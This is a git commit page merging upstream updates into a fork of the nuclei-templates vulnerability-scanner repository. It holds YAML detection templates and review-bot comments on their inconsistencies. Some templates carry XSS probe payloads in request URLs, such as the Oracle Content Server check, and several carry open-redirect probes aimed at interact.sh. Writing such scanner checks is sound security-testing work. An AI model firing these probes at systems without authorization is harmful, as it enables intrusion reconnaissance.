Merge branch 'projectdiscovery:master' into master

patch-1
vrenzolaverace 2022-11-06 12:26:41 +01:00 committed by GitHub
commit d3eab98b4c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
391 changed files with 9950 additions and 2927 deletions

View File

@ -1,40 +0,0 @@
cves/2017/CVE-2017-5689.yaml
cves/2018/CVE-2018-19287.yaml
cves/2019/CVE-2019-18957.yaml
cves/2021/CVE-2021-24940.yaml
cves/2021/CVE-2021-27909.yaml
cves/2021/CVE-2021-41432.yaml
cves/2022/CVE-2022-0434.yaml
cves/2022/CVE-2022-0535.yaml
cves/2022/CVE-2022-27593.yaml
cves/2022/CVE-2022-33965.yaml
cves/2022/CVE-2022-40083.yaml
cves/2022/CVE-2022-40684.yaml
exposed-panels/flureedb-admin-console.yaml
exposed-panels/forti/fortiadc-panel.yaml
exposed-panels/fortinet/fortiap-panel.yaml
exposed-panels/fortinet/fortios-panel.yaml
exposed-panels/fortinet/fortitester-login-panel.yaml
exposed-panels/gogs-panel.yaml
exposed-panels/mantisbt-panel.yaml
exposed-panels/nordex-wind-farm-portal.yaml
exposed-panels/nozomi-panel.yaml
exposures/configs/babel-config-exposure.yaml
exposures/configs/guard-config.yaml
exposures/configs/rollup-js-config.yaml
exposures/configs/scrutinizer-config.yaml
exposures/files/npm-anonymous-cli.yaml
miscellaneous/x-recruiting-header.yaml
misconfiguration/apache-drill-exposure.yaml
misconfiguration/envoy-admin-exposure.yaml
misconfiguration/hadoop-unauth-rce.yaml
misconfiguration/locust-exposure.yaml
misconfiguration/seeyon-unauth.yaml
misconfiguration/tomcat-cookie-exposed.yaml
network/detection/cql-native-transport.yaml
network/detection/microsoft-ftp-service.yaml
technologies/aqua-enterprise-detect.yaml
technologies/google-frontend-httpserver.yaml
technologies/vmware/vmware-horizon-version.yaml
technologies/zimbra-detect.yaml
vulnerabilities/other/flatpress-xss.yaml
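Review bot: the cleared list mixes two vendor directories for Fortinet panels, `exposed-panels/forti/fortiadc-panel.yaml` beside `exposed-panels/fortinet/fortiap-panel.yaml` and the other `fortinet/` entries; worth confirming the FortiADC template is not misfiled now that these paths have landed.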

View File

@ -27,6 +27,7 @@ files:
- cves/2007/CVE-2007-5728.yaml
- cves/2014/CVE-2014-9608.yaml
- cves/2018/CVE-2018-5233.yaml
- cves/2019/CVE-2019-14696.yaml
- cves/2020/CVE-2020-11930.yaml
- cves/2020/CVE-2020-19295.yaml
- cves/2020/CVE-2020-2036.yaml

View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1487 | daffainfo | 646 | cves | 1466 | info | 1533 | http | 4005 |
| panel | 687 | dhiyaneshdk | 622 | exposed-panels | 694 | high | 1071 | file | 77 |
| edb | 574 | pikpikcu | 338 | vulnerabilities | 516 | medium | 789 | network | 54 |
| lfi | 516 | pdteam | 273 | technologies | 296 | critical | 527 | dns | 17 |
| xss | 514 | geeknik | 196 | exposures | 290 | low | 231 | | |
| wordpress | 443 | dwisiswant0 | 170 | misconfiguration | 250 | unknown | 16 | | |
| exposure | 433 | 0x_akoko | 167 | token-spray | 234 | | | | |
| cve2021 | 361 | princechaddha | 151 | workflows | 190 | | | | |
| rce | 340 | ritikchaddha | 139 | default-logins | 106 | | | | |
| wp-plugin | 338 | pussycat0x | 137 | file | 77 | | | | |
| cve | 1510 | dhiyaneshdk | 679 | cves | 1488 | info | 1604 | http | 4170 |
| panel | 736 | daffainfo | 657 | exposed-panels | 741 | high | 1127 | file | 77 |
| edb | 574 | pikpikcu | 340 | vulnerabilities | 517 | medium | 812 | network | 68 |
| xss | 526 | pdteam | 274 | misconfiguration | 322 | critical | 534 | dns | 17 |
| lfi | 518 | geeknik | 196 | technologies | 303 | low | 249 | | |
| exposure | 505 | dwisiswant0 | 171 | exposures | 299 | unknown | 21 | | |
| wordpress | 455 | 0x_akoko | 169 | token-spray | 235 | | | | |
| cve2021 | 365 | ritikchaddha | 159 | workflows | 190 | | | | |
| wp-plugin | 350 | pussycat0x | 155 | default-logins | 111 | | | | |
| rce | 342 | princechaddha | 151 | file | 77 | | | | |
**301 directories, 4386 files**.
**307 directories, 4566 files**.
</td>
</tr>
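Review bot: in the regenerated table the `cve` tag count (1510) exceeds the `cves` directory count (1488), so 22 templates tagged `cve` sit outside `cves/`; that is expected for entries such as CNVD templates, but it is worth confirming nothing is misfiled before the stats are committed.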

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large

View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1487 | daffainfo | 646 | cves | 1466 | info | 1533 | http | 4005 |
| panel | 687 | dhiyaneshdk | 622 | exposed-panels | 694 | high | 1071 | file | 77 |
| edb | 574 | pikpikcu | 338 | vulnerabilities | 516 | medium | 789 | network | 54 |
| lfi | 516 | pdteam | 273 | technologies | 296 | critical | 527 | dns | 17 |
| xss | 514 | geeknik | 196 | exposures | 290 | low | 231 | | |
| wordpress | 443 | dwisiswant0 | 170 | misconfiguration | 250 | unknown | 16 | | |
| exposure | 433 | 0x_akoko | 167 | token-spray | 234 | | | | |
| cve2021 | 361 | princechaddha | 151 | workflows | 190 | | | | |
| rce | 340 | ritikchaddha | 139 | default-logins | 106 | | | | |
| wp-plugin | 338 | pussycat0x | 137 | file | 77 | | | | |
| cve | 1510 | dhiyaneshdk | 679 | cves | 1488 | info | 1604 | http | 4170 |
| panel | 736 | daffainfo | 657 | exposed-panels | 741 | high | 1127 | file | 77 |
| edb | 574 | pikpikcu | 340 | vulnerabilities | 517 | medium | 812 | network | 68 |
| xss | 526 | pdteam | 274 | misconfiguration | 322 | critical | 534 | dns | 17 |
| lfi | 518 | geeknik | 196 | technologies | 303 | low | 249 | | |
| exposure | 505 | dwisiswant0 | 171 | exposures | 299 | unknown | 21 | | |
| wordpress | 455 | 0x_akoko | 169 | token-spray | 235 | | | | |
| cve2021 | 365 | ritikchaddha | 159 | workflows | 190 | | | | |
| wp-plugin | 350 | pussycat0x | 155 | default-logins | 111 | | | | |
| rce | 342 | princechaddha | 151 | file | 77 | | | | |

View File

@ -1,12 +1,14 @@
id: CNVD-2021-09650
info:
name: Ruijie EWEB Gateway Platform - Remote Command Injection
author: daffainfo
name: Ruijie Networks-EWEB Network Management System - Remote Code Execution
author: daffainfo,pikpikcu
severity: critical
description: Ruijie EWEB Gateway Platform is susceptible to remote command injection attacks.
reference:
- http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
- https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py
- https://www.ruijienetworks.com
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
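Review bot: the title is renamed to "Remote Code Execution" and the product to "Ruijie Networks-EWEB Network Management System", but the description still reads `Ruijie EWEB Gateway Platform is susceptible to remote command injection attacks.`, so name and description now disagree on both product name and vulnerability class; update the description line to match the new title.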

View File

@ -1,36 +0,0 @@
id: CVE-2007-2449
info:
name: Apache Tomcat 4.x-7.x - Cross-Site Scripting
author: pdteam
severity: low
description: Apache Tomcat 4.x through 7.x contains a cross-site scripting vulnerability which can be used by an attacker to execute arbitrary script in the browser of an unsuspecting user in the context of the affected site.
reference:
- https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks
- http://tomcat.apache.org/security-6.html
- http://tomcat.apache.org/security-4.html
- http://tomcat.apache.org/security-5.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
metadata:
shodan-query: title:"Apache Tomcat"
tags: cve,cve2007,apache,misconfig,tomcat,disclosure,xss
requests:
- method: GET
path:
- "{{BaseURL}}/examples/jsp/snp/snoop.jsp"
matchers-condition: and
matchers:
- type: word
words:
- 'Request URI: /examples/jsp/snp/snoop.jsp'
- type: status
status:
- 200
# Enhanced by mp on 2022/09/15
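Review bot: this removes the template outright with no replacement visible. Its matcher only asserts `Request URI: /examples/jsp/snp/snoop.jsp` with a 200 status, which detects the shipped Tomcat examples directory (the tags already say `misconfig,disclosure`) rather than the XSS the CVE describes, and the metadata carries `severity: low` beside a 7.2 CVSS score; if the intent is to stop reporting this as a CVE finding, moving the check under `misconfiguration/` would keep the detection instead of dropping it.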

View File

@ -4,7 +4,7 @@ info:
name: Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in joomlaflickr.php in the Joomla Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in joomlaflickr.php in the Joomla! Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12085
- https://www.cvedetails.com/cve/CVE-2010-1980

View File

@ -1,7 +1,7 @@
id: CVE-2010-2033
info:
name: Joomla Percha Categories Tree 0.6 - Local File Inclusion
name: Joomla! Percha Categories Tree 0.6 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
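Review bot: the renamed title says "Percha Categories Tree 0.6" while the unchanged description describes the "Percha Fields Attach (com_perchafieldsattach) component 1.x"; one of the two identifies the wrong component, and because only the title was touched the mismatch survives this cleanup.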

View File

@ -1,7 +1,7 @@
id: CVE-2015-4074
info:
name: Joomla Helpdesk Pro plugin <1.4.0 - Local File Inclusion
name: Joomla! Helpdesk Pro plugin <1.4.0 - Local File Inclusion
author: 0x_Akoko
severity: high
description: Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task.

View File

@ -1,15 +1,15 @@
id: CVE-2016-10368
info:
name: Opsview Monitor Pro 4.5.x - Open Redirect
name: Opsview Monitor Pro - Open Redirect
author: 0x_Akoko
severity: medium
description: |
Open redirect vulnerability in Opsview Monitor Pro (Prior to 5.1.0.162300841 prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the back parameter to the login URI.
Opsview Monitor Pro before 5.1.0.162300841, before 5.0.2.27475, before 4.6.4.162391051, and 4.5.x without a certain 2016 security patch contains an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via the back parameter to the login URI.
reference:
- https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18774
- https://nvd.nist.gov/vuln/detail/CVE-2016-10368
- https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341
- https://nvd.nist.gov/vuln/detail/CVE-2016-10368
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -36,3 +36,5 @@ requests:
- type: status
status:
- 302
# Enhanced by mp on 2022/10/12

View File

@ -31,4 +31,4 @@ requests:
status:
- 200
# Enhanced by mp on 2022/06/09
# Enhanced by mp on 2022/10/24

View File

@ -1,34 +1,47 @@
id: CVE-2017-10075
info:
name: Oracle Content Server Cross-Site Scripting
name: Oracle Content Server - Cross-Site Scripting
author: madrobot
severity: high
description: Oracle Content Server version 11.1.1.9.0, 12.2.1.1.0 and 12.2.1.2.0 are susceptible to cross-site scripting. The vulnerability can be used to include HTML or JavaScript code in the affected web page. The code is executed in the browser of users if they visit the manipulated site.
description: |
Oracle Content Server version 11.1.1.9.0, 12.2.1.1.0 and 12.2.1.2.0 are susceptible to cross-site scripting. The vulnerability can be used to include HTML or JavaScript code in the affected web page. The code is executed in the browser of users if they visit the manipulated site.
reference:
- http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-10075
- http://web.archive.org/web/20211206074610/https://securitytracker.com/id/1038940
- https://nvd.nist.gov/vuln/detail/CVE-2017-10075
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
cvss-score: 8.2
cve-id: CVE-2017-10075
metadata:
google-dork: inurl:"/cs/idcplg"
verified: "true"
tags: cve,cve2017,xss,oracle
requests:
- method: GET
path:
- "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO"
- "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E"
- "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>&dSecurityGroup=&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO"
- "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<svg/onload=alert(document.domain)>"
- "ORACLE_QUERY"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
- type: word
words:
- "<script>alert(31337)</script>"
part: body
# Enhanced by mp on 2022/04/12
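Review bot: `verified: "true"` is a quoted string here whereas the other templates touched in this commit use the bare boolean `verified: true`; pick one form. The two new request paths also encode the same `QueryText` value differently (`%3E`/`%3C` in one, raw `>`/`<` in the other), which looks unintentional. Requiring both the reflected string and `ORACLE_QUERY` in the body (`condition: and`) together with the `text/html` header check is a sensible tightening against false positives.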

View File

@ -1,11 +1,11 @@
id: CVE-2017-11586
info:
name: FineCms < 5.0.9 - Open redirect
name: FineCMS <5.0.9 - Open Redirect
author: 0x_Akoko
severity: medium
description: |
dayrui FineCms 5.0.9 has URL Redirector Abuse via the url parameter in a sync action.
FineCMS 5.0.9 contains an open redirect vulnerability via the url parameter in a sync action. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse
- https://nvd.nist.gov/vuln/detail/CVE-2017-11586
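Review bot: the new description says `FineCMS 5.0.9 contains an open redirect vulnerability`, while the title reads `FineCMS <5.0.9` and the referenced write-up is titled "before v5.0.9"; the description should say "before 5.0.9" so the affected range matches the title.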
@ -37,3 +37,5 @@ requests:
part: header
regex:
- 'Refresh:(.*)url=http:\/\/interact\.sh'
# Enhanced by mp on 2022/10/12

View File

@ -4,11 +4,12 @@ info:
name: XOOPS Core 2.5.8 - Open Redirect
author: 0x_Akoko
severity: medium
description: XOOPS Core 2.5.8 has a stored URL redirect bypass vulnerability in /modules/profile/index.php because of the URL filter.
description: XOOPS Core 2.5.8 contains an open redirect vulnerability in /modules/profile/index.php due to the URL filter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://github.com/XOOPS/XoopsCore25/issues/523
- https://xoops.org
- https://www.cvedetails.com/cve/CVE-2017-12138
- https://nvd.nist.gov/vuln/detail/CVE-2017-12138
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
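Review bot: the rewritten description drops the word "bypass": the old text called this a "stored URL redirect bypass vulnerability ... because of the URL filter", whereas "due to the URL filter" now reads as though the filter itself causes the redirect. Suggest "due to a bypass of the URL filter in /modules/profile/index.php".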
@ -35,3 +36,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by md on 2022/10/13

View File

@ -4,7 +4,7 @@ info:
name: Seagate NAS OS 4.3.15.1 - Open Redirect
author: 0x_Akoko
severity: medium
description: Arbitrary Redirect in echo-server.html in Seagate NAS OS version 4.3.15.1 allows attackers to disclose information in the Referer header via the 'state' URL parameter.
description: Seagate NAS OS 4.3.15.1 contains an open redirect vulnerability in echo-server.html, which can allow an attacker to disclose information in the referer header via the state URL parameter.
reference:
- https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170
- https://nvd.nist.gov/vuln/detail/CVE-2018-12300
@ -26,3 +26,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by md on 2022/10/13

View File

@ -1,16 +1,16 @@
id: CVE-2018-12675
info:
name: SV3C HD Camera L-SERIES - Open Redirect
name: SV3C HD Camera L Series - Open Redirect
author: 0x_Akoko
severity: medium
description: |
The SV3C HD Camera (L-SERIES V2.3.4.2103-S50-NTD-B20170508B and V2.3.4.2103-S50-NTD-B20170823B) does not perform origin checks on URLs that the camera's web interface redirects a user to. This can be leveraged to send a user to an unexpected endpoint.
SV3C HD Camera L Series 2.3.4.2103-S50-NTD-B20170508B and 2.3.4.2103-S50-NTD-B20170823B contains an open redirect vulnerability. It does not perform origin checks on URLs in the camera's web interface, which can be leveraged to send a user to an unexpected endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://bishopfox.com/blog/sv3c-l-series-hd-camera-advisory
- https://vuldb.com/?id.125799
- https://nvd.nist.gov/vuln/detail/CVE-2018-12675
- https://www.bishopfox.com/news/2018/10/sv3c-l-series-hd-camera-multiple-vulnerabilities/
- https://nvd.nist.gov/vuln/detail/CVE-2018-12675
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
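Review bot: the rewritten description changes the meaning of the flaw. The original said the camera "does not perform origin checks on URLs that the camera's web interface redirects a user to"; the new text says "on URLs in the camera's web interface", which no longer states that the unchecked URLs are redirect targets. Also `SV3C HD Camera L Series ... and ... contains` pairs a plural subject with a singular verb.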
@ -30,3 +30,5 @@ requests:
part: body
words:
- '<META http-equiv="Refresh" content="0;URL=http://interact.sh">'
# Enhanced by md on 2022/10/13

View File

@ -1,11 +1,11 @@
id: CVE-2018-14474
info:
name: OrangeForum 1.4.0 - Open Redirect
name: Orange Forum 1.4.0 - Open Redirect
author: 0x_Akoko
severity: medium
description: |
views/auth.go in Orange Forum 1.4.0 allows Open Redirection via the next parameter to /login or /signup.
Orange Forum 1.4.0 contains an open redirect vulnerability in views/auth.go via the next parameter to /login or /signup. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://github.com/s-gv/orangeforum/commit/1f6313cb3a1e755880fc1354f3e1efc4dd2dd4aa
- https://seclists.org/fulldisclosure/2019/Jan/32
@ -30,3 +30,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by md on 2022/10/13

View File

@ -1,10 +1,10 @@
id: CVE-2018-14574
info:
name: Django Open Redirect
name: Django - Open Redirect
author: pikpikcu
severity: medium
description: django.middleware.common.CommonMiddleware in Django 1.11.x before 1.11.15 and 2.0.x before 2.0.8 has an Open Redirect.
description: Django 1.11.x before 1.11.15 and 2.0.x before 2.0.8 contains an open redirect vulnerability. If django.middleware.common.CommonMiddleware and APPEND_SLASH settings are selected, and if the project has a URL pattern that accepts any path ending in a slash, an attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://www.djangoproject.com/weblog/2018/aug/01/security-releases/
- https://usn.ubuntu.com/3726-1/
@ -12,6 +12,7 @@ info:
- https://www.debian.org/security/2018/dsa-4264
- http://web.archive.org/web/20210124194607/https://www.securityfocus.com/bid/104970/
- https://access.redhat.com/errata/RHSA-2019:0265
- https://nvd.nist.gov/vuln/detail/CVE-2018-14574
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -34,3 +35,5 @@ requests:
- "Location: https://www.interact.sh"
- "Location: http://www.interact.sh"
part: header
# Enhanced by md on 2022/10/13
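Review bot: this matcher checks two literal strings, `Location: https://www.interact.sh` and `Location: http://www.interact.sh`, while the sibling open-redirect templates in this same commit use the shared Location regex (the regex101 ZDYhFh pattern) that also accepts a bare `interact.sh`, protocol-relative `//` and backslash forms; consider switching to the same regex so detection coverage is consistent across templates.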

View File

@ -1,11 +1,11 @@
id: CVE-2018-16761
info:
name: Eventum v3.3.4 - Open Redirect
name: Eventum <3.4.0 - Open Redirect
author: 0x_Akoko
severity: medium
description: |
Eventum before 3.4.0 has an open redirect vulnerability.
Eventum before 3.4.0 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://www.invicti.com/web-applications-advisories/ns-18-021-open-redirection-vulnerabilities-in-eventum/
- https://github.com/eventum/eventum/releases/tag/v3.4.0
@ -29,3 +29,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by md on 2022/10/13

View File

@ -2,7 +2,7 @@ id: CVE-2018-17246
info:
name: Kibana - Local File Inclusion
author: princechaddha
author: princechaddha,thelicato
severity: critical
description: Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute JavaScript which could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
reference:
@ -25,19 +25,19 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- "\"message\":\"An internal server error occurred\""
part: body
- type: word
part: header
words:
- "kbn-name"
- "application/json"
- "kibana"
condition: and
part: header
- type: status
status:
- 500
condition: or
case-insensitive: true
# Enhanced by mp on 2022/05/13
- type: word
part: header
words:
- "application/json"
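Review bot: the header matcher in this hunk carries conflicting keys: `condition: and` sits after the three header words (`kbn-name`, `application/json`, `kibana`), while `condition: or` and `case-insensitive: true` appear below the `status:` block, where a status matcher does not take them. If the intent is "any of kbn-name/kibana, case-insensitively, plus application/json", then `condition: or` and `case-insensitive: true` belong directly under the kbn-name/kibana words and the `application/json` check belongs in its own matcher, as the trailing `- type: word / part: header / words: - "application/json"` block already does; the duplicate `application/json` entry in the first header list should then go.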

View File

@ -1,14 +1,15 @@
id: CVE-2018-17422
info:
name: dotCMS < 5.0.2 - Open Redirect
name: dotCMS <5.0.2 - Open Redirect
author: 0x_Akoko,daffainfo
severity: medium
description: |
dotCMS before 5.0.2 has open redirects via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter.
dotCMS before 5.0.2 contains multiple open redirect vulnerabilities via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://github.com/dotCMS/core/issues/15286
- https://www.cvedetails.com/cve/CVE-2018-17422
- https://nvd.nist.gov/vuln/detail/CVE-2018-17422
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -37,3 +38,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/13

View File

@ -1,11 +1,11 @@
id: CVE-2018-19287
info:
name: Ninja Forms <= 3.3.17 - Cross-Site Scripting
name: WordPress Ninja Forms <3.3.18 - Cross-Site Scripting
author: theamanrawat
severity: medium
description: |
XSS in the Ninja Forms plugin before 3.3.18 for WordPress allows Remote Attackers to execute JavaScript.
WordPress Ninja Forms plugin before 3.3.18 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in includes/Admin/Menus/Submissions.php via the begin_date, end_date, or form_id parameters. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/fb036dc2-0ee8-4a3e-afac-f52050b3f8c7
- https://wordpress.org/plugins/ninja-forms/
@ -50,3 +50,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/17

View File

@ -1,14 +1,15 @@
id: CVE-2018-6200
info:
name: vBulletin 3.x.x & 4.2.x - Open Redirect
name: vBulletin - Open Redirect
author: 0x_Akoko,daffainfo
severity: medium
description: |
vBulletin 3.x.x and 4.2.x through 4.2.5 has an open redirect via the redirector.php url parameter.
vBulletin 3.x.x and 4.2.x through 4.2.5 contains an open redirect vulnerability via the redirector.php URL parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://cxsecurity.com/issue/WLB-2018010251
- https://www.cvedetails.com/cve/CVE-2018-6200
- https://nvd.nist.gov/vuln/detail/CVE-2018-6200
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -35,3 +36,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/13

View File

@ -1,10 +1,10 @@
id: CVE-2019-1010290
info:
name: Babel - Open Redirection
name: Babel - Open Redirect
author: 0x_Akoko
severity: medium
description: Babel Multilingual site Babel All is affected by Open Redirection The impact is Redirection to any URL, which is supplied to redirect in a newurl parameter. The component is redirect The attack vector is The victim must open a link created by an attacker
description: Babel contains an open redirect vulnerability via redirect.php in the newurl parameter. An attacker can use any legitimate site using Babel to redirect user to a malicious site, thus possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations.
reference:
- https://untrustednetwork.net/en/2019/02/20/open-redirection-vulnerability-in-babel/
- http://dev.cmsmadesimple.org/project/files/729
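Review bot: minor grammar in the new description: "redirect user to a malicious site" should read "redirect a user to a malicious site", matching the wording used in the other open-redirect descriptions in this commit.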
@ -26,3 +26,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by md on 2022/10/13

View File

@ -1,14 +1,14 @@
id: CVE-2019-14223
info:
name: Alfresco Share Open Redirect
name: Alfresco Share - Open Redirect
author: pdteam
severity: medium
description: An issue was discovered in Alfresco Community Edition versions below 5.2.6, 6.0.N and 6.1.N. The Alfresco Share application is vulnerable to an Open Redirect attack via a crafted POST request. By manipulating
the POST parameters, an attacker can redirect a victim to a malicious website over any protocol the attacker desires (e.g.,http, https, ftp, smb, etc.).
description: Alfresco Share before 5.2.6, 6.0.N and 6.1.N contains an open redirect vulnerability via a crafted POST request. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://community.alfresco.com/content?filterID=all~objecttype~thread%5Bquestions%5D
- https://github.com/DrunkenShells/Disclosures/tree/master/CVE-2019-14223-Open%20Redirect%20in%20Alfresco%20Share-Alfresco%20Community
- https://nvd.nist.gov/vuln/detail/CVE-2019-14223
classification:
